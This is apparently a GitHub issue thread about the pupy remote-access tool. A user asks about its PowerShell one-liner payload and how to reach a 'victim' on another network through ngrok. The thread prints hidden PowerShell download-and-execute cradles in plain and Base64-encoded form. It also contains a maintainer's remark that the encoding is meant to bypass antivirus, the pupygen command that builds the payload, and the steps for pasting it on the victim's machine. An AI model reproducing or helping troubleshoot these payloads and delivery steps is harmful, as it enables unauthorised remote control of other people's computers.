### ISSUE TITLE
Question about PS1_Oneliner

### ISSUE THREAD

**Issue by jJit0** [n1nj4sec/pupy#572]
When I generate a  ps1_oneliner payload, I have two codes:

`powershell.exe -w hidden -noni -nop -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://192.168.114.45:8080/eiloShaegae1')"`
----------------------------------------------------------------------------------------------------------------------------------------
`powershell.exe -w hidden -noni -nop -enc WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7AGkAZQB4ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMQA0AC4ANAA1ADoAOAAwADgAMAAvAGUAaQBsAG8AUwBoAGEAZQBnAGEAZQAxACcAKQA=`

I want to understand where does the encrypted payload come from?

Can you explain to me the difference, and how to obtain the hashed payload from the clear, especially when I want to make one manually?

**Comment by pwna5aurus** [comment]
It's just Base64 encoded to obfuscate and bypass AVs.  

https://www.base64decode.org

**Comment by jJit0** [comment]
Ok thanks.

**Comment by jJit0** [comment]
I got another question. It's about combining Pupy + Ngrok (https://ngrok.com) using PS1_Oneliner.

I have tried many times, but it's not working. Here are the steps that I reproduce every time:

The attacker and the victim are on different LANs, imagine I live in US, and my victim lives in Canada.

1- Create the payload: `pupygen -f ps1_oneliner -A x86 -O windows --randomize-hash -s hide_argv,name=svcd connect -t http --host 192.168.1.14`
I'm listening on 0.0.0.0:8080

2- Forward the http server port to the WAN: `ngrok http 192.168.1.14:8080` or `ngrok http 8080`
I get then `https://c6149998.ngrok.io/ -> 192.168.1.14:8080` or `https://c6149998.ngrok.io/ -> localhost:8080`

3- Edit the address generated in the payload code, just like this: `powershell.exe -w hidden -noni -nop -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object System.Net.WebClient).DownloadString('https://c6149998.ngrok.io/eiloShaegae1')"`

4- When I Paste the code in the victim machine's cmd, I get nothing, no connection!
Even when I paste only the url with the stager file: `https://c6149998.ngrok.io/eiloShaegae1` I get an error: Bad Gateway.

Do you have any idea about this, and have you or someone else ProofConcepted it before ?

**Comment by pwna5aurus** [comment]
Bad Gateway sounds like a problem with the web server.  What is sitting
between your web server and the victim?

**Comment by jJit0** [comment]
The ngrok server is sort of MitM between me and the victim. I have checked also an ngrok alternative named `https://localtunnel.github.io/www`, but I got the same problem.

Actually, when I check the pupy webserver locally `firefox https://192.168.1.14:8080/eiloShaegae1`, I got a powershell payload page.

Now when I forward my webserver to Ngrok server and check the payload again locally `firefox https://c6149998.ngrok.io/eiloShaegae1` it doesn't recognize my server despite the good port.

The only thing you can do is to reproduce my steps and tell me what do you got ?

**Comment by pwna5aurus** [comment]
Well, this might be relevant:

https://github.com/n1nj4sec/pupy/issues/573
